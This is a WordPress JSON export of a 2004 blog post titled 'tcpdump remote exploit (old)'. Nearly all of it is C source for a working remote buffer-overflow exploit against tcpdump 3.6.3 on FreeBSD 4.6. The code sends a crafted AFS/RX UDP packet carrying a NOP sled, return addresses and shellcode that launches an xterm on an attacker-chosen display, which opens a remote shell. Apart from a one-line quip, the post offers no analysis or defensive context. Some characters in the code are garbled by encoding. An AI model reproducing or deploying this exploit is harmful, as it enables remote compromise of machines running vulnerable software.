{"id":149,"date":"2004-03-02T16:57:27","date_gmt":"2004-03-02T09:57:27","guid":{"rendered":""},"modified":"2004-03-02T16:57:27","modified_gmt":"2004-03-02T09:57:27","slug":"tcpdump-remote-exploit-old","status":"publish","type":"post","link":"https:\/\/deepquest.code511.com\/blog\/2004\/03\/tcpdump-remote-exploit-old\/","title":{"rendered":"tcpdump remote exploit (old)"},"content":{"rendered":"<p>old remote exploit against tcpdump.<\/p>\n<p>feed the goats!<!--more--><\/p>\n<p>  #include <stdio.h><br \/>\n??#include <netinet\/in.h><br \/>\n??#include <sys\/types.h><br \/>\n??#include <sys\/socket.h><br \/>\n??#include <netdb.h><br \/>\n??#include <arpa\/inet.h> <\/p>\n<p>??#define ADDR????????????0xbffff248<br \/>\n??#define OFFSET???????????0<br \/>\n??#define NUM_ADDR??????????10<br \/>\n??#define NOP???????????? 0x90<br \/>\n??#define NUM_NOP?????????? 100 <\/p>\n<p>??#define RX_CLIENT_INITIATED?? 1<br \/>\n??#define RX_PACKET_TYPE_DATA?? 1<br \/>\n??#define FS_RX_DPORT?????? 7000<br \/>\n??#define FS_RX_SPORT?????? 7001<br \/>\n??#define AFS_CALL????????134 <\/p>\n<p>??struct rx_header {<br \/>\n????u_int32_t epoch;<br \/>\n????u_int32_t cid;<br \/>\n????u_int32_t callNumber;<br \/>\n????u_int32_t seq;<br \/>\n????u_int32_t serial;<br \/>\n????u_char type;<br \/>\n????u_char flags;<br \/>\n????u_char userStatus;<br \/>\n????u_char securityIndex;<br \/>\n????u_short spare;<br \/>\n????u_short serviceId;<br \/>\n??}; <\/p>\n<p>??char shellcode[] =<br \/>\n???&#8221;xebx57x5exb3x21xfexcbx88x5ex2cx88x5ex23&#8243;<br \/>\n???&#8221;x88x5ex1fx31xdbx88x5ex07x46x46x88x5ex08&#8243;<br \/>\n???&#8221;x4ex4ex88x5exFFx89x5exfcx89x76xf0x8dx5e&#8221;<br \/>\n???&#8221;x08x89x5exf4x83xc3x03x89x5exf8x8dx4exf0&#8243;<br \/>\n???&#8221;x89xf3x8dx56xfcx31xc0xb0x0ex48x48x48xcd&#8221;<br \/>\n???&#8221;x80x31xc0x40x31xdbxcdx80xAAxAAxAAxAAxBB&#8221;<br \/>\n???&#8221;xBBxBBxBBxCCxCCxCCxCCxDDxDDxDDxDDxe8xa4&#8243;<br \/>\n???&#8221;xffxffxff&#8221;<br \/>\n???&#8221;\/bin\/shZ-cZ\/usr\/X11R6\/bin\/xtermZ-utZ-displayZ&#8221;; <\/p>\n<p>??long resolve(char *name) {<br \/>\n?? struct hostent *hp;<br \/>\n?? long ip; <\/p>\n<p>?? if ((ip=inet_addr(name))==-1) {<br \/>\n??? if ((hp=gethostbyname(name))==NULL) {<br \/>\n??????fprintf (stderr,&#8221;Can&#8217;t resolve host name [%s].n&#8221;,name);<br \/>\n??????exit(-1);<br \/>\n?????}<br \/>\n????memcpy(&#038;ip,(hp->h_addr),4);<br \/>\n????}<br \/>\n?? return(ip);<br \/>\n??} <\/p>\n<p>??int main (int argc, char *argv[]) { <\/p>\n<p>?? struct sockaddr_in addr,sin;<br \/>\n?? int sock,aux, offset=OFFSET;<br \/>\n?? char buffer[4048], *chptr;<br \/>\n?? struct rx_header *rxh;<br \/>\n?? long int *lptr, return_addr=ADDR; <\/p>\n<p>???fprintf(stderr,&#8221;Tcpdump 3.6.3 remote exploit against FreeBSD 4.6nn&#8221;); <\/p>\n<p>???if (argc<3) { \n????printf(\"Usage: %s [host] [display] [offset]n\",argv[0]); \n????exit(-1); \n????} \n\n???if (argc==4) offset=atoi(argv[3]); \n???return_addr+=offset; \n\n???fprintf(stderr,\"Using return addr: %#xn\",return_addr); \n\n???addr.sin_family=AF_INET; \n???addr.sin_addr.s_addr=resolve(argv[1]); \n???addr.sin_port=htons(FS_RX_DPORT); \n\n???if ((sock=socket(AF_INET, SOCK_DGRAM,0))<0) { \n???? perror(\"socket()\"); \n???? exit(-1); \n???? } \n\n???sin.sin_family=AF_INET; \n???sin.sin_addr.s_addr=INADDR_ANY; \n???sin.sin_port=htons(FS_RX_SPORT); \n\n???if (bind(sock,(struct sockaddr*)&#038;sin,sizeof(sin))<0) { \n?????perror(\"bind()\"); \n?????exit(-1); \n?????} \n\n???memset(buffer,0,sizeof(buffer)); \n???rxh=(struct rx_header *)buffer; \n\n???rxh->type=RX_PACKET_TYPE_DATA;<br \/>\n???rxh->seq=htonl(1);<br \/>\n???rxh->flags=RX_CLIENT_INITIATED; <\/p>\n<p>???lptr=(long int *)(buffer+sizeof(struct rx_header));<br \/>\n???*(lptr++)=htonl(AFS_CALL);<br \/>\n???*(lptr++)=htonl(1);<br \/>\n???*(lptr++)=htonl(2);<br \/>\n???*(lptr++)=htonl(3); <\/p>\n<p>???*(lptr++)=htonl(420);<br \/>\n???chptr=(char *)lptr;<br \/>\n???sprintf(chptr,&#8221;1 0n&#8221;);<br \/>\n???chptr+=4; <\/p>\n<p>???memset(chptr,&#8217;A&#8217;,120);<br \/>\n???chptr+=120;<br \/>\n???lptr=(long int *)chptr;<br \/>\n???for (aux=0;aux<NUM_ADDR;aux++) *(lptr++)=return_addr; \n???chptr=(char *)lptr; \n???memset(chptr,NOP,NUM_NOP); \n???chptr+=NUM_NOP; \n???shellcode[30]=(char)(46+strlen(argv[2])); \n???memcpy(chptr,shellcode,strlen(shellcode)); \n???chptr+=strlen(shellcode); \n???memcpy(chptr,argv[2],strlen(argv[2])); \n???chptr+=strlen(argv[2]); \n\n???sprintf(chptr,\" 1n\"); \n\n???if (sendto(sock,buffer,520,0,&#038;addr,sizeof(addr))==-1) { \n???? perror(\"send()\"); \n???? exit(-1); \n???? } \n\n???fprintf(stderr,\"Packet Sent Waiting For Xterm!!!nn\"); \n\n???close(sock); \n???return(0); \n?? } \n<\/p>\n","protected":false},"excerpt":{"rendered":"<p>old remote exploit against tcpdump. feed the goats!<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_seopress_robots_primary_cat":"","_seopress_titles_title":"","_seopress_titles_desc":"","_seopress_robots_index":"","jetpack_post_was_ever_published":false,"_jetpack_newsletter_access":"","_jetpack_dont_email_post_to_subs":false,"_jetpack_newsletter_tier_id":0,"_jetpack_memberships_contains_paywalled_content":false,"_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[3],"tags":[],"class_list":["post-149","post","type-post","status-publish","format-standard","hentry","category-security"],"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"jetpack_shortlink":"https:\/\/wp.me\/p4bBYZ-2p","_links":{"self":[{"href":"https:\/\/deepquest.code511.com\/blog\/wp-json\/wp\/v2\/posts\/149","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/deepquest.code511.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/deepquest.code511.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/deepquest.code511.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/deepquest.code511.com\/blog\/wp-json\/wp\/v2\/comments?post=149"}],"version-history":[{"count":0,"href":"https:\/\/deepquest.code511.com\/blog\/wp-json\/wp\/v2\/posts\/149\/revisions"}],"wp:attachment":[{"href":"https:\/\/deepquest.code511.com\/blog\/wp-json\/wp\/v2\/media?parent=149"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/deepquest.code511.com\/blog\/wp-json\/wp\/v2\/categories?post=149"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/deepquest.code511.com\/blog\/wp-json\/wp\/v2\/tags?post=149"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}